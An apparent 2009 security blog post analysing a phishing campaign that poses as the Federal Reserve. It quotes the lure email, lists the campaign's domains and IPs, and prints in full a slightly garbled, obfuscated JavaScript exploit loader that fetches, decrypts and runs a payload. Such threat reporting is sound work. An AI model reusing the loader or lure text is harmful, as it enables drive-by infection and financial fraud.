Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 12 May 2009

Federal Reserve goes LuckySploit

I've received several e-mails today, claiming to be from the Federal Reserve - funny considering I'm not in the US. Usually I just forward them to PhishTank and the appropriate authorities/hosting co's, and file it away. This one however, got me interested because I noticed a relation - remember this?.

The story referred to at the ISC, references an issue with a multitude of sites hosted by LunarPages, being hacked and containing exploits (the sites at LunarPages are still carrying the exploits btw). This time they obviously decided to go via e-mail and use their own sites instead.

The e-mail itself, contains the following content;

FEDERAL RESERVE BANK

Important:

You're getting this letter in connection with new directions issued by U.S. Treasury Department. The directions concern U.S. Federal Wire online payments.

A country-wide phishing attack began on May 6, 2009. It's taking place hitherto. Therefore a great number of banks and credit unions is affected by this attack and quantity of illegal wire transfers has reached an extremely high level.

U.S. Treasury Department, Federal Reserve and Federal Deposit Insurance Corporation (FDIC) in common worked out a complex of immediate actions for the highest possible reduction of fraudulent operations. We regret to inform you that definite restrictions will be applied to all Federal Wire transfers from May 12 till May 25.

Here you can get more detailed information regarding the affected banks and U.S. Treasury Department restrictions:

hxxp://usbanks.esecure-federal.us/35634/FRB/phishing/Issue~73891/

Federal Reserve Bank System Administration


The only difference between the 3 e-mails I've received, are the "from" addresses (all faked of course), the subject lines, and the domains they point to - all of which are on the same IP, 221.5.74.34 (netname: UNICOM-GD). The subjects I've seen thus far are;

Attention - Important Customer Notification
Important: Federal Reserve Bank!
Corporate Cusomers - Please read carefully

The e-mail headers for the e-mails, indicate the following as the origins;

94.222.248.23 (dslb-094-222-248-023.pools.arcor-ip.net)
88.249.38.101 (dsl88-249-9829.ttnet.net.tr)
201.240.92.239 (client-201.240.92.239.speedy.net.pe)

I did some research when I first received the e-mail, on the domain itself, and found a plethora of domains, all of which are being used for the same purposes and all of which are on the same IP, 221.5.74.34;

esecure-federal.com
esecure-federal.net
esecure-federal.us
federalbanks.us
federalbanksystem.com
federalbanksystem.net
federalbanksystem.us
federalreserve-direct.com
federalreserve-direct.us
federalreserve-online.com
federalreserve-online.us
fedwire.usatreasury-direct.net
fedwire.usatreasury-direct.us
frb-direct.net
frb-secure.net
mail.federalreserve-direct.us
mail.frb-direct.net
mail.frb-secure.net
mail.usatreasury-direct.net
ns1.esecure-federal.com
ns1.esecure-federal.net
ns1.esecure-federal.us
ns1.federalbanks.us
ns1.federalbanksystem.com
ns1.federalbanksystem.net
ns1.federalbanksystem.us
ns1.federalreservebanks-online.us
ns1.federalreserve-direct.com
ns1.federalreserve-direct.net
ns1.federalreserve-direct.us
ns1.federalreservenet.us
ns1.federalreserve-online.com
ns1.federalreserve-online.net
ns1.federalreserve-online.us
ns1.fedreservebanks.com
ns1.fedreservebanks.net
ns1.fedreservebanks.us
ns1.frb-direct.net
ns1.frb-direct.us
ns1.frb-secure.com
ns1.frb-secure.net
ns1.treasurydept.us
ns1.usatreasury-direct.com
ns1.usatreasury-direct.net
ns1.usatreasury-direct.us
ns2.esecure-federal.com
ns2.esecure-federal.net
ns2.esecure-federal.us
ns2.federalbanks.us
ns2.federalbanksystem.com
ns2.federalbanksystem.net
ns2.federalbanksystem.us
ns2.federalreservebanks-online.us
ns2.federalreserve-direct.com
ns2.federalreserve-direct.net
ns2.federalreserve-direct.us
ns2.federalreservenet.us
ns2.federalreserve-online.com
ns2.federalreserve-online.net
ns2.federalreserve-online.us
ns2.fedreservebanks.com
ns2.fedreservebanks.net
ns2.fedreservebanks.us
ns2.frb-direct.net
ns2.frb-direct.us
ns2.frb-secure.com
ns2.frb-secure.net
ns2.treasurydept.us
ns2.usatreasury-direct.com
ns2.usatreasury-direct.net
ns2.usatreasury-direct.us
usatreasury-direct.net
usatreasury-direct.us
usbanks.esecure-federal.net
usbanks.esecure-federal.us
ustreasury.federalbanks.us
ustreasury.federalbanksystem.com
ustreasury.federalbanksystem.net
ustreasury.federalbanksystem.us
ustreasurydept.frb-direct.net
ustreasurydept.frb-direct.us
wire.esecure-federal.com
wire.federalreserve-direct.com
wire.federalreserve-online.us
wire.frb-secure.net
www.esecure-federal.com
www.esecure-federal.net
www.esecure-federal.us
www.federalbanks.us
www.federalbanksystem.com
www.federalbanksystem.net
www.federalbanksystem.us
www.federalreserve-direct.com
www.federalreserve-direct.us
www.federalreserve-online.com
www.federalreserve-online.us
www.frb-direct.net
www.frb-secure.net
www.usatreasury-direct.net
www.usatreasury-direct.us

The domains they are associated with are clarafin.info, dns2.zief.pl and monkey-squad.net - all of which are involved in malicious activity.

The "Federal" domains, all load an iFrame to another file in the same server, which contains;

ibat=1738;
dira='t';
illo="dB";
adicit=24;
numen='odeAt';
uirque="0.7";
parvae="app";
speque='s';
audis="l";
morent='b';
puella='B';
ocelo='Vi';
amarem="u";
licuit=16;
saepta=33;
pandar='@';
ducum='p';
curiis='eques';
vicina="2";
vestit="9.02e2";
ibamus='roso';
uocata="";
tantus='.';
patres='u';
regie=31;
viva='gl';
utro=435;
ordine=488;
mento='i';
mouent=8473;
bundy=8423;
aperte='j';
hiemis='UN';
tatius="s";
montem="i";
pareas=6;
ceraue='ames';
nimbos=757;
muso="o";
uertes='View';
pandit='H';
luetis="setA";
sens="4.53e2";
anzus="doc";
jungle='U';
rumpat='2';
obicat='w';
rabida=61;
rupto='c';
avos=6041;
euroo='d';
pebble=4723;
oreque='n';
boree=4;
dolori='y';
nixque='[U';
wattle='o';
libo=2;
budge='.781';
tangit='';
sickie='9';
sono='le';
needle="a";
achate='X';
intexo=6089;
metiri="0.9";
soluti="0.77";
egomet='D';
belli='24';
cynthi=81;
securo="r";
laetae=505;
parmam='cu';
ullas=9;
revoco="tri";
nuptum='5711';
vetor='T';
certae='48';
cque='g';
census="Te";
vagor=8;
canus="37";
velem="d";
obero='e';
edant='W';
cessas='l';
longa=0;
operta='5584';
mint='P';
osque='ine';
teneto='h';
cupant="5.09e2";
ineant='Da';
veho='.8';
esky='6.';
capant=7880;
ortam='do';
lituo='f';
medius='ntW';
abeas='+/';
aperti="t";
credis=(soluti<=.325?2.213e3:''+'A'+puella+'C'+egomet+'E'+'F'+tangit);
pool=(0.5624,'r'+'ing'+tangit);
function alteri(crust)
{
vera=new crust()
}
function infert(myrtum,whip)
{
for(lippie=0;lippie<myrtum;lippie++)whip[lippie]=lippie
}
function pergit(iram,clavum)
{
for(lippie=0;lippie<iram;lippie++)
{
amorem=(amorem+vera[lippie]+clavum[oblata](lippie%clavum[dirty]))%iram;
talis=vera[lippie];
vera[lippie]=vera[amorem];
vera[amorem]=talis
}
}
function labet(lernae,dunny)
{
lippie=(lippie+1)%dunny;
amorem=(amorem+vera[lippie])%dunny;
watson();
vera[amorem]=talis;
stygio(lernae)
}
function watson(bail)
{
talis=vera[lippie];
vera[lippie]=vera[amorem]
}
function stygio(virgam)
{
adnare+=amittoeei[desunt](virgam[oblata](fervet)^vera[(vera[lippie]+vera[amorem])%256])
}
function larry(lernae)
{
for(fervet=0;fervet<lernae[dirty];fervet++)
{
labet(lernae,256)
}
}
function imitat(iussos)
{
lippie=iussos;
amorem=iussos
}
uicus=('.1'>=1?954:bolam);
ashes=(1.6e1,'a');
(8.<=871?uicus:2.)((licuit,this));
slim=(3495.,edocet);
credis+=(6,'G'+'HI'+'J'+'K'+'L'+'M'+'NO'+'');
snit=(6586>.8?araque:5.);
uelato=("6."<7.3e2?marti:31.);
sacrum=(6,amem);
gingiie=(.7<='7.8e3'?snit:8);
adhuc=(27.,uelato)[(7.77e2,uocata+"d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+uocata)];
desunt=(9218,''+'f'+'r'+'o'+tangit)+(pareas,'m'+'C')+(0.5<='4262'?''+'h'+'a'+'r'+tangit:4)+(6.865e3>=vagor?'C':0.4e1)+(0.61,'o'+euroo+'e'+tangit);
dirty=(6.2e1,sono)+(.41,'ng')+('684'>60?''+'t'+'h'+tangit:ibat);
amittoeei=(cupant>42.?adhuc:.807)[(.6951,'defa'+'ultV'+'iew'+tangit)][(6.,tangit+obicat+'i'+oreque+euroo+'o'+'w'+tangit)][(0.104,'S')+(3.51e2,tangit+dira+'')+(0.45<'274'?pool:.6471)];
credis+=(1e0<='1003.'?'P'+'QRST'+jungle:2e0)+(99.,tangit+'V'+edant+'X'+'Y'+'Z'+tangit);
itabo=(8e0,'ray');
phoebe=(.88,tangit+'a'+'t'+'h'+tangit);
tenebo=(72.,sacrum);
dentum=(6.7e1,tangit+'u'+oreque+'c'+tangit)+(9.61e2>="7"?dira+'i'+wattle+'n':3.);
banjo=(7.2e1,adhuc);
credis+=(63.,''+'ab'+'cde'+tangit)+(397.,tangit+'f'+cque+'h'+'i'+aperte+'k'+'l'+'m'+tangit);
fibro=('974'<=0.722?.9:'e');
vitem=(7962.>5.6e1?banjo:0.47e2);
timens=("0.8"<=373?tangis:4e0);
mori=(".9">6.8e1?161:tangit+'v'+'a'+tangit);
credis+=(355,''+'n'+wattle+ducum+'q'+'r'+speque+'t'+'u'+'')+("0.4"<=863?tangit+'vwxyz01234':0.2)+(bundy,''+'5'+'6'+'78'+sickie+abeas+'='+tangit);
oblata=(53.,tangit+rupto+teneto+tangit)+(1.,'ar'+'C'+tangit)+(8.64e2,''+numen);
if((7.992e3,credis)[(5.1e1,fibro)+(64.,mori)+(7.,'l')])
{
credis=("2666"<=.4031?7e0:tangit);
vitem=(9e0<="3346"?credis:7e0)
}
aequat=(nimbos,tangit+wattle+'r'+'a'+'g'+'e'+tangit);
lucem=(2.22e2,viva);
nimbus=(799>="134"?tangit+'o'+morent+'a'+tangit:889.);
sports=(8>=0.186?vitem:1563);
function tangis(pindan,verum,fovet,arcent)
{
(2e0,alteri)((0.841e3<'3.8e1'?.5:styxeez));
(4.,infert)((5008<6571?256:boree),(0.3451<=".6669"?vera:719.));
(5,imitat)((5e0<='415'?longa:0.4619));
(4e0,pergit)((ullas,256),(825.>=861?.72:pindan));
(7.,imitat)((9.,longa));
adnare=(0.8186<=.1?8e0:tangit);
(1.858e3>=esky?larry:7e0)((3,verum));
return (2.856e3,adnare)
}
fulmeniie=(3.7e1>belli?sports:27);
function amem(pascua,saltus,iubet,mall)
{
var caeso;
uates=(1e0<=125?molem:8.308e3)((7,''+'x'),(intexo,tangit+'r'+'e'+'t'+'u'+'r'+oreque+' '+dira+dolori+tangit)+(7.8e1>=vestit?6427:'peo')+(0.2107,tangit+lituo+'('+'x'+')'+tangit));
nescio=(veho>8.356e3?6e0:molem)(("160"<=2.6e1?3.3e1:'r'+'et'+'urn'+' ne'+'w '+'X'+tangit)+(0.9,'MLH')+(5.7e1,'ttpR')+(9e0>=77?1.47e2:curiis+'t()'));
spell=(9.4e1>=8.4e1?molem:96)((.3947,''+'r'+'e'+'t'+'u'+'r'+'n'+' '+'X'+tangit)+("2867." if(!(5.807e3,caeso)&&((5.35e2<=1?9.8e1:uates)((6745>2e0?spell:8.1e1)()))!=(18,'un'+'def'+osque+'d'))
{
caeso=(4.522e3,nescio)()
}
return (62.,caeso)
}
gimlet=('696'<=7.?1.:fulmeniie)[(2.93e2,'defa'+patres+'lt'+ocelo+'ew'+tangit)][(4.9e1>="1.5e1"?''+speque+'e'+'l'+'f'+tangit:8730)][(.83,tangit+obicat+mento+oreque+euroo+'o'+obicat+'')][(9.29e2>5.235e3?254.:'self'+tangit)][(21,tangit+'do'+parmam+'m'+'en'+'t')][(7582,tangit+euroo+obero+lituo+'a'+'u'+'l'+'t'+'V'+mento+obero+obicat+tangit)][(76<='.5627'?212.:tangit+'F'+tangit)+(8.394e3,dentum)];
usuum=(5<3052.?fulmeniie:287.)[(783>=.55?tangit+euroo+obero+lituo+'a'+'u'+cessas+dira+'V'+'i'+'e'+'w'+'':511.)][(.21>=0.86?.3:speque+'el'+'f')][(92<36?ullas:tangit+'w'+'i'+oreque+euroo+wattle+obicat+'')][(5e0>'37.'?libo:lucem)+(.19>=5823.?4691:nimbus)+(9.2e1,'lSt')+(0.6<=12.?aequat:7977)];
ramumuuz=(9711,fulmeniie)[(licuit,tangit+euroo+obero+lituo+'au'+'l'+dira+ocelo+'e'+obicat)][(0.58>2.32e2?3.9e1:'self'+tangit)][(52<"8."?pareas:tangit+'M'+tangit)+(9e0<1.55e2?phoebe:5)];
styxeez=(.9,fulmeniie)[('0.9e1'<=0.7?6172:'default'+uertes)][(1.16e2<1.5e1?3.:tangit+obicat+'in'+ortam+obicat+tangit)][(0.188<"80"?tangit+'A'+'':1.2e1)+(2.4e2>uirque?''+'r'+'':43.)+(654,itabo)];
poscitjie=new (.3,styxeez)();
molem=(378.<=.4761?57.:gimlet);
unco=(88.<"3.8e1"?5:ashes)+(.946<=66?gingiie:.2)((8654.,credis),(9.42e2<="4e0"?.5:30));
lataettr=(.64>"4639"?5.7e1:meos);
lenis=(18.,molem)((996,tangit+'r'+obero+dira+'')+(0.8165,''+'u'+'r'+oreque+' '+tangit)+(97.,tangit+'tenebo()'));
opinoreea=(3.37e2,molem)((".62"<=227?'x':5),(cynthi>.1150?dolori:.17),(123,'ret')+(2682.<='742'?6e0:'ur'+'n ')+('.72'<=8861?'t'+'imens(x,'+'y)':27.));
audeatqqa=(1.39e2,molem)((4134.,'x'),(6>1930?ordine:tangit+'r'+obero+'t'+tangit)+(.5881,'urn ')+(36,''+speque+'y'+'r'+dira+mento+'s'+'('+'x'+')'+tangit));
uritis=(110<'500'?tangit+wattle+'nr'+obero:3.)+(saepta<"6.1e1"?'a'+'d'+dolori+'st'+tangit:6e0)+(66.,'atec')+(6.678e3>="6073."?tangit+teneto+'a'+oreque+cque+obero+tangit:3e0);
(3.81e2<=670?audeatqqa:0.47)((libo,unco));
function syrtis(tractu,excepi,foedas,ventus)
{
var datis=(64<'8222'?lenis:9117)();
(0.313,datis)[(1e0,"op"+"en"+uocata)]((12.>=5e0?'GET':27.),(7e0,'?')+(2,lataettr)((28.,opinoreea)((4e0>=4.26e2?797:'ruinam'+'yyo'),("641.">=3.97e2?tractu:581))),(71,true));
(1.4e1,datis)[(991,uritis)]=function()
{
if((.68<'6.2e1'?datis:5)[(0.2,""+securo+"e"+"a"+velem+"y"+"S"+aperti+"a"+aperti+"e"+uocata)]==(651<sens?8e0:boree)&&(9154.,datis)[("18"<=saepta?""+"s"+aperti+"a"+"t"+amarem+tatius+"":mouent)]==(150.<79?.6952:200))
{
("3.13e2">6.155e3?6.536e3:molem)((canus>3.?opinoreea:4288)((935<=".58"?55:tractu),(33.<='8'?boree:slim)((.350,datis)[(7>870?.5099:securo+"e"+tatius+"p"+"on"+"se"+census+"xt"+"")])))()
}
};
(2074>=3.623e3?4e0:datis)[(vicina>7.?9609:"sen"+"d")]((ullas,0))
}
function remus(pindan,ratty,sueba,mater)
{
var audiat=ramumuuz["floor"](ramumuuz["random"]()*pindan[dirty]);
volvet+=pindan["substring"](audiat,audiat+1)
}
function miner(verum,pindan,volvet,tenus)
{
for(lippie=0;lippie<verum;lippie++)
{
remus(pindan,lippie,verum,volvet);
}
}
function araque(pindan,verum,tenus,serua)
{
volvet='';
miner(verum,pindan,volvet,tenus);
return volvet
}
function meos(nervis,obvius,peius,tullo)
{
var sciat=(34,tangit);
var adnare;
var lippie;
var scies=(0.8<=.909?longa:9739);
var labori=(0.870,1);
lippie=(7920.,0);
for(adnare=0;lippie<nervis[dirty];lippie++,adnare++)
{
scies=scies*256+nervis[oblata](lippie);
labori=labori*4;
sciat=sciat+credis["charAt"](parseInt(scies/labori));
scies=scies%labori;
if(labori==64)
{
sciat=sciat+credis["charAt"](parseInt(scies));
scies=0;
labori=1;
adnare++
}
if(adnare>=75)
{
adnare=-1;
sciat=sciat+'\n'
}
}
if((.620,lippie)%(.1322,3))
{
sciat=sciat+credis["charAt"](parseInt(scies*((lippie%3==1)?16:4)));
sciat=sciat+((lippie%3)==1?'==':amittoeei[desunt](61))
}
return (1,sciat)
}
function edocet(nervis,fire,hortum,metae)
{
var sciat=(2e0,tangit);
var lippie;
var scies=("7e0">=61?6567.:longa);
var labori=(.265,1);
for(lippie=0;lippie<nervis[dirty];lippie++)
{
if(nervis["charAt"](lippie)==amittoeei[desunt](61)||nervis["charAt"](lippie)=='\n')break;
scies=scies*64+credis["indexOf"](nervis["charAt"](lippie));
labori=(labori==1?64:labori/4);
if(labori!=64)
{
sciat=sciat+amittoeei[desunt](parseInt(scies/labori));
scies=scies%labori
}
}
return ('0.77'<821?sciat:8.)
}
function bolam(aether,locos,stupet,exeant)
{
this[("436."<.866?7.5e1:uocata+"m"+needle+securo+aperti+montem+uocata)]=(5581>=.6?aether:3.73e2);
if((816,aether)[(3e0<=523?uocata+"p"+needle+securo+"e"+"n"+aperti+uocata:3914.)]==(4.,aether))
{
intus=(5e0,'a'+'')
}
else
{
ashes+=(".921">=regie?6e1:pandar)
}
}


Sadly, detection for it at VT is non-existent;

http://www.virustotal.com/analisis/70f92d8286afa3ca23a770f7ed7f99af

And Wepawet couldn't seem to work with it either.

http://wepawet.cs.ucsb.edu/view.php?hash=b2fe358d386b59d84e6fcdefdd66f17b&type=js

At the time of writing, I've got Malzilla trying to decode it, but it's taking it's time (been running over 10 mins pinching CPU usage of around 80%). If it ever finishes, I'll post the results.

/edit 13-05-2009 01:51

3 more e-mails received in the last 15 mins, and seems they've got a new domain, wire.federalreserve-online.us (also added to the list above), same IP as the rest though. The sender of the latest 3 are also new, 201.16.204.161 (201-016-204-161.dynamic.idial.com.br)

No comments: